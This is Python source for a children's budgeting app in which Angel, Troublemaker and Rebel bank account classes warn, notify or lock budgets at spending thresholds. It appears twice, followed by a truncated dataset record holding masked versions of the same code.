:param bank_name: a string
:param bank_balance: a float
:param budget_manager: a BudgetManager
"""
self.bank_account_no = bank_account_no
self.bank_name = bank_name
self.bank_balance = bank_balance
self.transactions = []
self.budget_manager = budget_manager
self._locked = False
def record_transaction(self, transaction: Transaction) ->bool:
"""
Records a transaction and returns True if this transaction is
recorded successfully. A transaction is recorded successfully
when this bank account is not locked, has enough balance, and
the budget associated with the transaction is not locked.
:param transaction: a Transaction, the transaction to record
:return: a bool, True if record successfully, False otherwise
"""
if self._locked:
print('Failed to record transaction! Your account has been locked!'
)
return False
if transaction.amount > self.bank_balance:
print('Failed to record transaction! Not enough balance!')
return False
budget = self.budget_manager.get_budget(transaction.budget_category)
if budget.locked:
print('Failed to record transaction! This budget has been locked!')
return False
self.transactions.append(transaction)
self.bank_balance -= transaction.amount
budget.amount_spent += transaction.amount
self._warn_and_lock_if_needed(transaction)
return True
@abstractmethod
def _warn_and_lock_if_needed(self, transaction: Transaction) ->None:
"""
Contains the logic to check if a warning or notification should
be issued to the user. It also locks a budget or this bank
account if needed. The exact algorithm would vary bank account
to bank account.
:param transaction: a Transaction, the newly recorded
transaction
:return: None
"""
pass
def print_transactions_for_review(self, budget: Budget) ->None:
"""
Prints a list of transactions in the given budget for review.
:param budget: a Budget
:return: None
"""
print(
f'Please review the following transactions in the {budget.name} budget:'
)
transactions = self.get_transactions_by_budget(budget.category)
for transaction in transactions:
print(transaction)
def _warn_nearing_exceed_budget(self, budget: Budget, exceeded_percent: int
) ->None:
"""
Issues a warning to the user that they are about to exceed this
budget.
:param budget: a Budget, the budget that they are about to
exceed
:param exceeded_percent: an int, the percent that they have
already exceeded
:return: None
"""
print(
f'[WARNING] You are about to exceed the {budget.name} budget! You went over {exceeded_percent}% of the total ${budget.total_amount}.'
)
def _notify_exceeded_budget(self, budget: Budget) ->None:
"""
Notifies the user that they've just exceeded this budget.
:param budget: a Budget, the budget that they've just exceeded
:return: None
"""
print(f'[NOTIFICATION] You have exceeded the {budget.name} budget.')
def _lock_budget(self, budget: Budget) ->None:
"""
Locks a budget.
:param budget: a Budget, the budget to be locked
:return: None
"""
budget.lock()
print(f'Your {budget.name} budget has now been locked!')
def get_transactions_by_budget(self, category: BudgetCategory) ->list:
"""
Returns a list of transactions for the given budget category.
:param category: a BudgetCategory
:return: a list of Transaction, the transactions in that
category
"""
return [transaction for transaction in self.transactions if
transaction.budget_category == category]
def get_budgets(self) ->list:
"""
Returns a list of budgets.
:return: a list of Budget objects
"""
return self.budget_manager.get_budgets()
def __str__(self):
transactions_info = ''
for transaction in self.transactions:
transactions_info += f'{transaction}\n'
if len(transactions_info) == 0:
transactions_info = "You haven't made any transaction yet.\n"
return f"""*** Bank Account Details ***
• Bank account number: {self.bank_account_no}
• Bank name: {self.bank_name}
• Status: {'Locked' if self._locked else 'Available'}
• Transactions:
{transactions_info}• Closing balance: ${self.bank_balance}"""
class AngelBankAccount(BankAccount):
"""
This bank account is designed for Angel users. The Angel user
represents a user who's parents are not worried at all.
"""
def _warn_and_lock_if_needed(self, transaction: Transaction) ->None:
"""
Issues a warning or locks budget/bank account when these
conditions are met:
- Never gets locked out of a budget category. They can continue
spending money even if they exceed the budget in question.
- Gets politely notified if they exceed a budget category.
- Gets a warning if they exceed more than 90% of a budget.
:param transaction: a Transaction, the newly recorded
transaction
:return: None
"""
budget = self.budget_manager.get_budget(transaction.budget_category)
exceeded_ratio = budget.exceeded_ratio
if exceeded_ratio > 1:
self._notify_exceeded_budget(budget)
self.print_transactions_for_review(budget)
elif exceeded_ratio > 0.9:
self._warn_nearing_exceed_budget(budget, 90)
self.print_transactions_for_review(budget)
class TroublemakerBankAccount(BankAccount):
"""
This bank account is designed for Troublemaker children. These
children often find themselves in trouble. These are usually minor
incidents and their parents are concerned but not worried.
"""
def _warn_and_lock_if_needed(self, transaction: Transaction) ->None:
"""
Issues a warning or locks budget/bank account when these
conditions are met:
- Gets a warning if they exceed more than 75% of a budget
category.
- Gets politely notified if they exceed a budget category.
- Gets locked out of conducting transactions in a budget
category if they exceed it by 120% of the amount assigned to the
budget in question.
:param transaction: a Transaction, the newly recorded
transaction
:return: None
"""
budget = self.budget_manager.get_budget(transaction.budget_category)
exceeded_ratio = budget.exceeded_ratio
if exceeded_ratio > 1.2:
self._lock_budget(budget)
self.print_transactions_for_review(budget)
elif exceeded_ratio > 1:
self._notify_exceeded_budget(budget)
self.print_transactions_for_review(budget)
elif exceeded_ratio > 0.75:
self._warn_nearing_exceed_budget(budget, 75)
self.print_transactions_for_review(budget)
class RebelBankAccount(BankAccount):
"""
This bank account is designed for Rebel children. The Rebel
represents a child who refuses to follow any rules and believes that
society should be broken down and restructured. Parents of these
children are quite worried about them.
"""
def _warn_and_lock_if_needed(self, transaction: Transaction) ->None:
"""
Issues a warning or locks budget/bank account when these
conditions are met:
- They get a warning for every transaction after exceeding 50%
of a budget.
- Gets ruthlessly notified if they exceed a budget category.
- Gets locked out of conducting transactions in a budget
category if they exceed it by 100% of the amount assigned to the
budget in question.
- If they exceed their budget in 2 or more categories then they
get locked out of their account completely.
:param transaction: a Transaction, the newly recorded
transaction
:return: None
"""
budget = self.budget_manager.get_budget(transaction.budget_category)
exceeded_ratio = budget.exceeded_ratio
if exceeded_ratio > 1:
self._notify_exceeded_budget(budget)
self._lock_budget(budget)
self.print_transactions_for_review(budget)
if self.budget_manager.no_locked_budgets >= 2:
self._locked = True
print('YOUR BANK ACCOUNT HAS BEEN LOCKED!')
elif exceeded_ratio > 0.5:
self._warn_nearing_exceed_budget(budget, 50)
self.print_transactions_for_review(budget)
class BankAccountCreator:
"""
An utility class that helps create a BankAccount.
"""
_user_type_mapper = {UserType.ANGEL: AngelBankAccount, UserType.
TROUBLEMAKER: TroublemakerBankAccount, UserType.REBEL: RebelBankAccount
}
"""
A dictionary that maps a UserType enum to an appropriate BankAccount
class.
"""
@staticmethod
def load_test_account() ->BankAccount:
"""
Creates and returns a test bank account.
:return: a BankAccount
"""
budget_manager = BudgetCreator.load_test_budget_manager()
return TroublemakerBankAccount('123123', 'HSBC', 1000, budget_manager)
@classmethod
def create_bank_account(cls, user_type: UserType) ->BankAccount:
"""
Prompts the user for bank account details, initializes a Bank
Account based on the given user type and returns it.
:param user_type: a UserType
:return: a BankAccount
"""
bank_account_no = input('Enter bank account number: ')
bank_name = input('Enter bank name: ')
bank_balance = -1
while bank_balance < 0:
bank_balance = float(input('Enter bank balance: '))
if bank_balance < 0:
print(
'Bank balance must be greater than or equal to 0! Please enter again!'
)
budget_manager = BudgetCreator.create_budget_manager()
return cls._user_type_mapper[user_type](bank_account_no, bank_name,
bank_balance, budget_manager)
<|reserved_special_token_1|>
"""
This module contains the class definitions for all types of BankAccount
alongside BankAccountCreator as a supporting class to create an
appropriate bank account for a given user type.
"""
from abc import ABC
from abc import abstractmethod
from transaction import Transaction
from budget import Budget
from budget import BudgetManager
from budget import BudgetCategory
from budget import BudgetCreator
from user import UserType
class BankAccount(ABC):
"""
An abstract base class that represents a bank account. By default,
all bank accounts have:
- a bank account number
- a bank name
- a bank balance
- a budget manager to manage budgets
- a list of transactions
- a locked state to determine whether this account is locked.
"""
def __init__(self, bank_account_no: str, bank_name: str,
bank_balance: float, budget_manager: BudgetManager):
"""
Initializes a bank account.
:param bank_account_no: a string
:param bank_name: a string
:param bank_balance: a float
:param budget_manager: a BudgetManager
"""
self.bank_account_no = bank_account_no
self.bank_name = bank_name
self.bank_balance = bank_balance
self.transactions = []
self.budget_manager = budget_manager
self._locked = False
def record_transaction(self, transaction: Transaction) -> bool:
"""
Records a transaction and returns True if this transaction is
recorded successfully. A transaction is recorded successfully
when this bank account is not locked, has enough balance, and
the budget associated with the transaction is not locked.
:param transaction: a Transaction, the transaction to record
:return: a bool, True if record successfully, False otherwise
"""
if self._locked:
print('Failed to record transaction! Your account has been locked!'
)
return False
if transaction.amount > self.bank_balance:
print('Failed to record transaction! Not enough balance!')
return False
budget = self.budget_manager.get_budget(transaction.budget_category)
if budget.locked:
print('Failed to record transaction! This budget has been locked!')
return False
self.transactions.append(transaction)
self.bank_balance -= transaction.amount
budget.amount_spent += transaction.amount
self._warn_and_lock_if_needed(transaction)
return True
@abstractmethod
def _warn_and_lock_if_needed(self, transaction: Transaction) -> None:
"""
Contains the logic to check if a warning or notification should
be issued to the user. It also locks a budget or this bank
account if needed. The exact algorithm would vary bank account
to bank account.
:param transaction: a Transaction, the newly recorded
transaction
:return: None
"""
pass
def print_transactions_for_review(self, budget: Budget) -> None:
"""
Prints a list of transactions in the given budget for review.
:param budget: a Budget
:return: None
"""
print(f'Please review the following transactions in the {budget.name} '
f'budget:')
transactions = self.get_transactions_by_budget(budget.category)
for transaction in transactions:
print(transaction)
def _warn_nearing_exceed_budget(self, budget: Budget,
exceeded_percent: int) -> None:
"""
Issues a warning to the user that they are about to exceed this
budget.
:param budget: a Budget, the budget that they are about to
exceed
:param exceeded_percent: an int, the percent that they have
already exceeded
:return: None
"""
print(f'[WARNING] You are about to exceed the {budget.name} budget! '
f'You went over {exceeded_percent}% of the total '
f'${budget.total_amount}.')
def _notify_exceeded_budget(self, budget: Budget) -> None:
"""
Notifies the user that they've just exceeded this budget.
:param budget: a Budget, the budget that they've just exceeded
:return: None
"""
print(f'[NOTIFICATION] You have exceeded the {budget.name} budget.')
def _lock_budget(self, budget: Budget) -> None:
"""
Locks a budget.
:param budget: a Budget, the budget to be locked
:return: None
"""
budget.lock()
print(f'Your {budget.name} budget has now been locked!')
def get_transactions_by_budget(self, category: BudgetCategory) -> list:
"""
Returns a list of transactions for the given budget category.
:param category: a BudgetCategory
:return: a list of Transaction, the transactions in that
category
"""
return [transaction
for transaction in self.transactions
if transaction.budget_category == category]
def get_budgets(self) -> list:
"""
Returns a list of budgets.
:return: a list of Budget objects
"""
return self.budget_manager.get_budgets()
def __str__(self):
transactions_info = ''
for transaction in self.transactions:
transactions_info += f'{transaction}\n'
if len(transactions_info) == 0:
transactions_info = "You haven't made any transaction yet.\n"
return f'*** Bank Account Details ***\n' \
f'• Bank account number: {self.bank_account_no}\n' \
f'• Bank name: {self.bank_name}\n' \
f'• Status: {"Locked" if self._locked else "Available"}\n' \
f'• Transactions:\n' \
f'{transactions_info}' \
f'• Closing balance: ${self.bank_balance}'
class AngelBankAccount(BankAccount):
"""
This bank account is designed for Angel users. The Angel user
represents a user who's parents are not worried at all.
"""
def _warn_and_lock_if_needed(self, transaction: Transaction) -> None:
"""
Issues a warning or locks budget/bank account when these
conditions are met:
- Never gets locked out of a budget category. They can continue
spending money even if they exceed the budget in question.
- Gets politely notified if they exceed a budget category.
- Gets a warning if they exceed more than 90% of a budget.
:param transaction: a Transaction, the newly recorded
transaction
:return: None
"""
budget = self.budget_manager.get_budget(transaction.budget_category)
exceeded_ratio = budget.exceeded_ratio
if exceeded_ratio > 1:
self._notify_exceeded_budget(budget)
self.print_transactions_for_review(budget)
elif exceeded_ratio > 0.9:
self._warn_nearing_exceed_budget(budget, 90)
self.print_transactions_for_review(budget)
class TroublemakerBankAccount(BankAccount):
"""
This bank account is designed for Troublemaker children. These
children often find themselves in trouble. These are usually minor
incidents and their parents are concerned but not worried.
"""
def _warn_and_lock_if_needed(self, transaction: Transaction) -> None:
"""
Issues a warning or locks budget/bank account when these
conditions are met:
- Gets a warning if they exceed more than 75% of a budget
category.
- Gets politely notified if they exceed a budget category.
- Gets locked out of conducting transactions in a budget
category if they exceed it by 120% of the amount assigned to the
budget in question.
:param transaction: a Transaction, the newly recorded
transaction
:return: None
"""
budget = self.budget_manager.get_budget(transaction.budget_category)
exceeded_ratio = budget.exceeded_ratio
if exceeded_ratio > 1.2:
self._lock_budget(budget)
self.print_transactions_for_review(budget)
elif exceeded_ratio > 1:
self._notify_exceeded_budget(budget)
self.print_transactions_for_review(budget)
elif exceeded_ratio > 0.75:
self._warn_nearing_exceed_budget(budget, 75)
self.print_transactions_for_review(budget)
class RebelBankAccount(BankAccount):
"""
This bank account is designed for Rebel children. The Rebel
represents a child who refuses to follow any rules and believes that
society should be broken down and restructured. Parents of these
children are quite worried about them.
"""
def _warn_and_lock_if_needed(self, transaction: Transaction) -> None:
"""
Issues a warning or locks budget/bank account when these
conditions are met:
- They get a warning for every transaction after exceeding 50%
of a budget.
- Gets ruthlessly notified if they exceed a budget category.
- Gets locked out of conducting transactions in a budget
category if they exceed it by 100% of the amount assigned to the
budget in question.
- If they exceed their budget in 2 or more categories then they
get locked out of their account completely.
:param transaction: a Transaction, the newly recorded
transaction
:return: None
"""
budget = self.budget_manager.get_budget(transaction.budget_category)
exceeded_ratio = budget.exceeded_ratio
if exceeded_ratio > 1:
self._notify_exceeded_budget(budget)
self._lock_budget(budget)
self.print_transactions_for_review(budget)
if self.budget_manager.no_locked_budgets >= 2:
self._locked = True
print('YOUR BANK ACCOUNT HAS BEEN LOCKED!')
elif exceeded_ratio > 0.5:
self._warn_nearing_exceed_budget(budget, 50)
self.print_transactions_for_review(budget)
class BankAccountCreator:
"""
An utility class that helps create a BankAccount.
"""
_user_type_mapper = {
UserType.ANGEL: AngelBankAccount,
UserType.TROUBLEMAKER: TroublemakerBankAccount,
UserType.REBEL: RebelBankAccount,
}
"""
A dictionary that maps a UserType enum to an appropriate BankAccount
class.
"""
@staticmethod
def load_test_account() -> BankAccount:
"""
Creates and returns a test bank account.
:return: a BankAccount
"""
budget_manager = BudgetCreator.load_test_budget_manager()
return TroublemakerBankAccount('123123', 'HSBC', 1000, budget_manager)
@classmethod
def create_bank_account(cls, user_type: UserType) -> BankAccount:
"""
Prompts the user for bank account details, initializes a Bank
Account based on the given user type and returns it.
:param user_type: a UserType
:return: a BankAccount
"""
bank_account_no = input('Enter bank account number: ')
bank_name = input('Enter bank name: ')
bank_balance = -1
while bank_balance < 0:
bank_balance = float(input('Enter bank balance: '))
if bank_balance < 0:
print('Bank balance must be greater than or equal to 0! Please'
' enter again!')
budget_manager = BudgetCreator.create_budget_manager()
return cls._user_type_mapper[user_type](
bank_account_no,
bank_name,
bank_balance,
budget_manager,
)
|
flexible
|
{
"blob_id": "830ae4b6a6b2c4e1bbe6928b3a4b0be86d2ec7a3",
"index": 3743,
"step-1": "<mask token>\n\n\nclass AngelBankAccount(BankAccount):\n <mask token>\n <mask token>\n\n\nclass TroublemakerBankAccount(BankAccount):\n \"\"\"\n This bank account is designed for Troublemaker children. These\n children often find themselves in trouble. These are usually minor\n incidents and their parents are concerned but not worried.\n \"\"\"\n\n def _warn_and_lock_if_needed(self, transaction: Transaction) ->None:\n \"\"\"\n Issues a warning or locks budget/bank account when these\n conditions are met:\n - Gets a warning if they exceed more than 75% of a budget\n category.\n - Gets politely notified if they exceed a budget category.\n - Gets locked out of conducting transactions in a budget\n category if they exceed it by 120% of the amount assigned to the\n budget in question.\n :param transaction: a Transaction, the newly recorded\n transaction\n :return: None\n \"\"\"\n budget = self.budget_manager.get_budget(transaction.budget_category)\n exceeded_ratio = budget.exceeded_ratio\n if exceeded_ratio > 1.2:\n self._lock_budget(budget)\n self.print_transactions_for_review(budget)\n elif exceeded_ratio > 1:\n self._notify_exceeded_budget(budget)\n self.print_transactions_for_review(budget)\n elif exceeded_ratio > 0.75:\n self._warn_nearing_exceed_budget(budget, 75)\n self.print_transactions_for_review(budget)\n\n\nclass RebelBankAccount(BankAccount):\n \"\"\"\n This bank account is designed for Rebel children. The Rebel\n represents a child who refuses to follow any rules and believes that\n society should be broken down and restructured. Parents of these\n children are quite worried about them.\n \"\"\"\n\n def _warn_and_lock_if_needed(self, transaction: Transaction) ->None:\n \"\"\"\n Issues a warning or locks budget/bank account when these\n conditions are met:\n - They get a warning for every transaction after exceeding 50%\n of a budget.\n - Gets ruthlessly notified if they exceed a budget category.\n - Gets locked out of conducting transactions in a budget\n category if they exceed it by 100% of the amount assigned to the\n budget in question.\n - If they exceed their budget in 2 or more categories then they\n get locked out of their account completely.\n :param transaction: a Transaction, the newly recorded\n transaction\n :return: None\n \"\"\"\n budget = self.budget_manager.get_budget(transaction.budget_category)\n exceeded_ratio = budget.exceeded_ratio\n if exceeded_ratio > 1:\n self._notify_exceeded_budget(budget)\n self._lock_budget(budget)\n self.print_transactions_for_review(budget)\n if self.budget_manager.no_locked_budgets >= 2:\n self._locked = True\n print('YOUR BANK ACCOUNT HAS BEEN LOCKED!')\n elif exceeded_ratio > 0.5:\n self._warn_nearing_exceed_budget(budget, 50)\n self.print_transactions_for_review(budget)\n\n\nclass BankAccountCreator:\n \"\"\"\n An utility class that helps create a BankAccount.\n \"\"\"\n _user_type_mapper = {UserType.ANGEL: AngelBankAccount, UserType.\n TROUBLEMAKER: TroublemakerBankAccount, UserType.REBEL: RebelBankAccount\n }\n \"\"\"\n A dictionary that maps a UserType enum to an appropriate BankAccount\n class. \n \"\"\"\n\n @staticmethod\n def load_test_account() ->BankAccount:\n \"\"\"\n Creates and returns a test bank account.\n :return: a BankAccount\n \"\"\"\n budget_manager = BudgetCreator.load_test_budget_manager()\n return TroublemakerBankAccount('123123', 'HSBC', 1000, budget_manager)\n\n @classmethod\n def create_bank_account(cls, user_type: UserType) ->BankAccount:\n \"\"\"\n Prompts the user for bank account details, initializes a Bank\n Account based on the given user type and returns it.\n :param user_type: a UserType\n :return: a BankAccount\n \"\"\"\n bank_account_no = input('Enter bank account number: ')\n bank_name = input('Enter bank name: ')\n bank_balance = -1\n while bank_balance < 0:\n bank_balance = float(input('Enter bank balance: '))\n if bank_balance < 0:\n print(\n 'Bank balance must be greater than or equal to 0! Please enter again!'\n )\n budget_manager = BudgetCreator.create_budget_manager()\n return cls._user_type_mapper[user_type](bank_account_no, bank_name,\n bank_balance, budget_manager)\n",
"step-2": "<mask token>\n\n\nclass BankAccount(ABC):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def _lock_budget(self, budget: Budget) ->None:\n \"\"\"\n Locks a budget.\n :param budget: a Budget, the budget to be locked\n :return: None\n \"\"\"\n budget.lock()\n print(f'Your {budget.name} budget has now been locked!')\n <mask token>\n\n def get_budgets(self) ->list:\n \"\"\"\n Returns a list of budgets.\n :return: a list of Budget objects\n \"\"\"\n return self.budget_manager.get_budgets()\n <mask token>\n\n\nclass AngelBankAccount(BankAccount):\n \"\"\"\n This bank account is designed for Angel users. The Angel user\n represents a user who's parents are not worried at all.\n \"\"\"\n\n def _warn_and_lock_if_needed(self, transaction: Transaction) ->None:\n \"\"\"\n Issues a warning or locks budget/bank account when these\n conditions are met:\n - Never gets locked out of a budget category. They can continue\n spending money even if they exceed the budget in question.\n - Gets politely notified if they exceed a budget category.\n - Gets a warning if they exceed more than 90% of a budget.\n :param transaction: a Transaction, the newly recorded\n transaction\n :return: None\n \"\"\"\n budget = self.budget_manager.get_budget(transaction.budget_category)\n exceeded_ratio = budget.exceeded_ratio\n if exceeded_ratio > 1:\n self._notify_exceeded_budget(budget)\n self.print_transactions_for_review(budget)\n elif exceeded_ratio > 0.9:\n self._warn_nearing_exceed_budget(budget, 90)\n self.print_transactions_for_review(budget)\n\n\nclass TroublemakerBankAccount(BankAccount):\n \"\"\"\n This bank account is designed for Troublemaker children. These\n children often find themselves in trouble. These are usually minor\n incidents and their parents are concerned but not worried.\n \"\"\"\n\n def _warn_and_lock_if_needed(self, transaction: Transaction) ->None:\n \"\"\"\n Issues a warning or locks budget/bank account when these\n conditions are met:\n - Gets a warning if they exceed more than 75% of a budget\n category.\n - Gets politely notified if they exceed a budget category.\n - Gets locked out of conducting transactions in a budget\n category if they exceed it by 120% of the amount assigned to the\n budget in question.\n :param transaction: a Transaction, the newly recorded\n transaction\n :return: None\n \"\"\"\n budget = self.budget_manager.get_budget(transaction.budget_category)\n exceeded_ratio = budget.exceeded_ratio\n if exceeded_ratio > 1.2:\n self._lock_budget(budget)\n self.print_transactions_for_review(budget)\n elif exceeded_ratio > 1:\n self._notify_exceeded_budget(budget)\n self.print_transactions_for_review(budget)\n elif exceeded_ratio > 0.75:\n self._warn_nearing_exceed_budget(budget, 75)\n self.print_transactions_for_review(budget)\n\n\nclass RebelBankAccount(BankAccount):\n \"\"\"\n This bank account is designed for Rebel children. The Rebel\n represents a child who refuses to follow any rules and believes that\n society should be broken down and restructured. Parents of these\n children are quite worried about them.\n \"\"\"\n\n def _warn_and_lock_if_needed(self, transaction: Transaction) ->None:\n \"\"\"\n Issues a warning or locks budget/bank account when these\n conditions are met:\n - They get a warning for every transaction after exceeding 50%\n of a budget.\n - Gets ruthlessly notified if they exceed a budget category.\n - Gets locked out of conducting transactions in a budget\n category if they exceed it by 100% of the amount assigned to the\n budget in question.\n - If they exceed their budget in 2 or more categories then they\n get locked out of their account completely.\n :param transaction: a Transaction, the newly recorded\n transaction\n :return: None\n \"\"\"\n budget = self.budget_manager.get_budget(transaction.budget_category)\n exceeded_ratio = budget.exceeded_ratio\n if exceeded_ratio > 1:\n self._notify_exceeded_budget(budget)\n self._lock_budget(budget)\n self.print_transactions_for_review(budget)\n if self.budget_manager.no_locked_budgets >= 2:\n self._locked = True\n print('YOUR BANK ACCOUNT HAS BEEN LOCKED!')\n elif exceeded_ratio > 0.5:\n self._warn_nearing_exceed_budget(budget, 50)\n self.print_transactions_for_review(budget)\n\n\nclass BankAccountCreator:\n \"\"\"\n An utility class that helps create a BankAccount.\n \"\"\"\n _user_type_mapper = {UserType.ANGEL: AngelBankAccount, UserType.\n TROUBLEMAKER: TroublemakerBankAccount, UserType.REBEL: RebelBankAccount\n }\n \"\"\"\n A dictionary that maps a UserType enum to an appropriate BankAccount\n class. \n \"\"\"\n\n @staticmethod\n def load_test_account() ->BankAccount:\n \"\"\"\n Creates and returns a test bank account.\n :return: a BankAccount\n \"\"\"\n budget_manager = BudgetCreator.load_test_budget_manager()\n return TroublemakerBankAccount('123123', 'HSBC', 1000, budget_manager)\n\n @classmethod\n def create_bank_account(cls, user_type: UserType) ->BankAccount:\n \"\"\"\n Prompts the user for bank account details, initializes a Bank\n Account based on the given user type and returns it.\n :param user_type: a UserType\n :return: a BankAccount\n \"\"\"\n bank_account_no = input('Enter bank account number: ')\n bank_name = input('Enter bank name: ')\n bank_balance = -1\n while bank_balance < 0:\n bank_balance = float(input('Enter bank balance: '))\n if bank_balance < 0:\n print(\n 'Bank balance must be greater than or equal to 0! Please enter again!'\n )\n budget_manager = BudgetCreator.create_budget_manager()\n return cls._user_type_mapper[user_type](bank_account_no, bank_name,\n bank_balance, budget_manager)\n",
"step-3": "<mask token>\n\n\nclass BankAccount(ABC):\n <mask token>\n <mask token>\n <mask token>\n\n @abstractmethod\n def _warn_and_lock_if_needed(self, transaction: Transaction) ->None:\n \"\"\"\n Contains the logic to check if a warning or notification should\n be issued to the user. It also locks a budget or this bank\n account if needed. The exact algorithm would vary bank account\n to bank account.\n :param transaction: a Transaction, the newly recorded\n transaction\n :return: None\n \"\"\"\n pass\n <mask token>\n\n def _warn_nearing_exceed_budget(self, budget: Budget, exceeded_percent: int\n ) ->None:\n \"\"\"\n Issues a warning to the user that they are about to exceed this\n budget.\n :param budget: a Budget, the budget that they are about to\n exceed\n :param exceeded_percent: an int, the percent that they have\n already exceeded\n :return: None\n \"\"\"\n print(\n f'[WARNING] You are about to exceed the {budget.name} budget! You went over {exceeded_percent}% of the total ${budget.total_amount}.'\n )\n <mask token>\n\n def _lock_budget(self, budget: Budget) ->None:\n \"\"\"\n Locks a budget.\n :param budget: a Budget, the budget to be locked\n :return: None\n \"\"\"\n budget.lock()\n print(f'Your {budget.name} budget has now been locked!')\n\n def get_transactions_by_budget(self, category: BudgetCategory) ->list:\n \"\"\"\n Returns a list of transactions for the given budget category.\n :param category: a BudgetCategory\n :return: a list of Transaction, the transactions in that\n category\n \"\"\"\n return [transaction for transaction in self.transactions if \n transaction.budget_category == category]\n\n def get_budgets(self) ->list:\n \"\"\"\n Returns a list of budgets.\n :return: a list of Budget objects\n \"\"\"\n return self.budget_manager.get_budgets()\n <mask token>\n\n\nclass AngelBankAccount(BankAccount):\n \"\"\"\n This bank account is designed for Angel users. The Angel user\n represents a user who's parents are not worried at all.\n \"\"\"\n\n def _warn_and_lock_if_needed(self, transaction: Transaction) ->None:\n \"\"\"\n Issues a warning or locks budget/bank account when these\n conditions are met:\n - Never gets locked out of a budget category. They can continue\n spending money even if they exceed the budget in question.\n - Gets politely notified if they exceed a budget category.\n - Gets a warning if they exceed more than 90% of a budget.\n :param transaction: a Transaction, the newly recorded\n transaction\n :return: None\n \"\"\"\n budget = self.budget_manager.get_budget(transaction.budget_category)\n exceeded_ratio = budget.exceeded_ratio\n if exceeded_ratio > 1:\n self._notify_exceeded_budget(budget)\n self.print_transactions_for_review(budget)\n elif exceeded_ratio > 0.9:\n self._warn_nearing_exceed_budget(budget, 90)\n self.print_transactions_for_review(budget)\n\n\nclass TroublemakerBankAccount(BankAccount):\n \"\"\"\n This bank account is designed for Troublemaker children. These\n children often find themselves in trouble. These are usually minor\n incidents and their parents are concerned but not worried.\n \"\"\"\n\n def _warn_and_lock_if_needed(self, transaction: Transaction) ->None:\n \"\"\"\n Issues a warning or locks budget/bank account when these\n conditions are met:\n - Gets a warning if they exceed more than 75% of a budget\n category.\n - Gets politely notified if they exceed a budget category.\n - Gets locked out of conducting transactions in a budget\n category if they exceed it by 120% of the amount assigned to the\n budget in question.\n :param transaction: a Transaction, the newly recorded\n transaction\n :return: None\n \"\"\"\n budget = self.budget_manager.get_budget(transaction.budget_category)\n exceeded_ratio = budget.exceeded_ratio\n if exceeded_ratio > 1.2:\n self._lock_budget(budget)\n self.print_transactions_for_review(budget)\n elif exceeded_ratio > 1:\n self._notify_exceeded_budget(budget)\n self.print_transactions_for_review(budget)\n elif exceeded_ratio > 0.75:\n self._warn_nearing_exceed_budget(budget, 75)\n self.print_transactions_for_review(budget)\n\n\nclass RebelBankAccount(BankAccount):\n \"\"\"\n This bank account is designed for Rebel children. The Rebel\n represents a child who refuses to follow any rules and believes that\n society should be broken down and restructured. Parents of these\n children are quite worried about them.\n \"\"\"\n\n def _warn_and_lock_if_needed(self, transaction: Transaction) ->None:\n \"\"\"\n Issues a warning or locks budget/bank account when these\n conditions are met:\n - They get a warning for every transaction after exceeding 50%\n of a budget.\n - Gets ruthlessly notified if they exceed a budget category.\n - Gets locked out of conducting transactions in a budget\n category if they exceed it by 100% of the amount assigned to the\n budget in question.\n - If they exceed their budget in 2 or more categories then they\n get locked out of their account completely.\n :param transaction: a Transaction, the newly recorded\n transaction\n :return: None\n \"\"\"\n budget = self.budget_manager.get_budget(transaction.budget_category)\n exceeded_ratio = budget.exceeded_ratio\n if exceeded_ratio > 1:\n self._notify_exceeded_budget(budget)\n self._lock_budget(budget)\n self.print_transactions_for_review(budget)\n if self.budget_manager.no_locked_budgets >= 2:\n self._locked = True\n print('YOUR BANK ACCOUNT HAS BEEN LOCKED!')\n elif exceeded_ratio > 0.5:\n self._warn_nearing_exceed_budget(budget, 50)\n self.print_transactions_for_review(budget)\n\n\nclass BankAccountCreator:\n \"\"\"\n An utility class that helps create a BankAccount.\n \"\"\"\n _user_type_mapper = {UserType.ANGEL: AngelBankAccount, UserType.\n TROUBLEMAKER: TroublemakerBankAccount, UserType.REBEL: RebelBankAccount\n }\n \"\"\"\n A dictionary that maps a UserType enum to an appropriate BankAccount\n class. \n \"\"\"\n\n @staticmethod\n def load_test_account() ->BankAccount:\n \"\"\"\n Creates and returns a test bank account.\n :return: a BankAccount\n \"\"\"\n budget_manager = BudgetCreator.load_test_budget_manager()\n return TroublemakerBankAccount('123123', 'HSBC', 1000, budget_manager)\n\n @classmethod\n def create_bank_account(cls, user_type: UserType) ->BankAccount:\n \"\"\"\n Prompts the user for bank account details, initializes a Bank\n Account based on the given user type and returns it.\n :param user_type: a UserType\n :return: a BankAccount\n \"\"\"\n bank_account_no = input('Enter bank account number: ')\n bank_name = input('Enter bank name: ')\n bank_balance = -1\n while bank_balance < 0:\n bank_balance = float(input('Enter bank balance: '))\n if bank_balance < 0:\n print(\n 'Bank balance must be greater than or equal to 0! Please enter again!'\n )\n budget_manager = BudgetCreator.create_budget_manager()\n return cls._user_type_mapper[user_type](bank_account_no, bank_name,\n bank_balance, budget_manager)\n",
"step-4": "<mask token>\n\n\nclass BankAccount(ABC):\n <mask token>\n\n def __init__(self, bank_account_no: str, bank_name: str, bank_balance:\n float, budget_manager: BudgetManager):\n \"\"\"\n Initializes a bank account.\n :param bank_account_no: a string\n :param bank_name: a string\n :param bank_balance: a float\n :param budget_manager: a BudgetManager\n \"\"\"\n self.bank_account_no = bank_account_no\n self.bank_name = bank_name\n self.bank_balance = bank_balance\n self.transactions = []\n self.budget_manager = budget_manager\n self._locked = False\n\n def record_transaction(self, transaction: Transaction) ->bool:\n \"\"\"\n Records a transaction and returns True if this transaction is\n recorded successfully. A transaction is recorded successfully\n when this bank account is not locked, has enough balance, and\n the budget associated with the transaction is not locked.\n :param transaction: a Transaction, the transaction to record\n :return: a bool, True if record successfully, False otherwise\n \"\"\"\n if self._locked:\n print('Failed to record transaction! Your account has been locked!'\n )\n return False\n if transaction.amount > self.bank_balance:\n print('Failed to record transaction! Not enough balance!')\n return False\n budget = self.budget_manager.get_budget(transaction.budget_category)\n if budget.locked:\n print('Failed to record transaction! This budget has been locked!')\n return False\n self.transactions.append(transaction)\n self.bank_balance -= transaction.amount\n budget.amount_spent += transaction.amount\n self._warn_and_lock_if_needed(transaction)\n return True\n\n @abstractmethod\n def _warn_and_lock_if_needed(self, transaction: Transaction) ->None:\n \"\"\"\n Contains the logic to check if a warning or notification should\n be issued to the user. It also locks a budget or this bank\n account if needed. The exact algorithm would vary bank account\n to bank account.\n :param transaction: a Transaction, the newly recorded\n transaction\n :return: None\n \"\"\"\n pass\n\n def print_transactions_for_review(self, 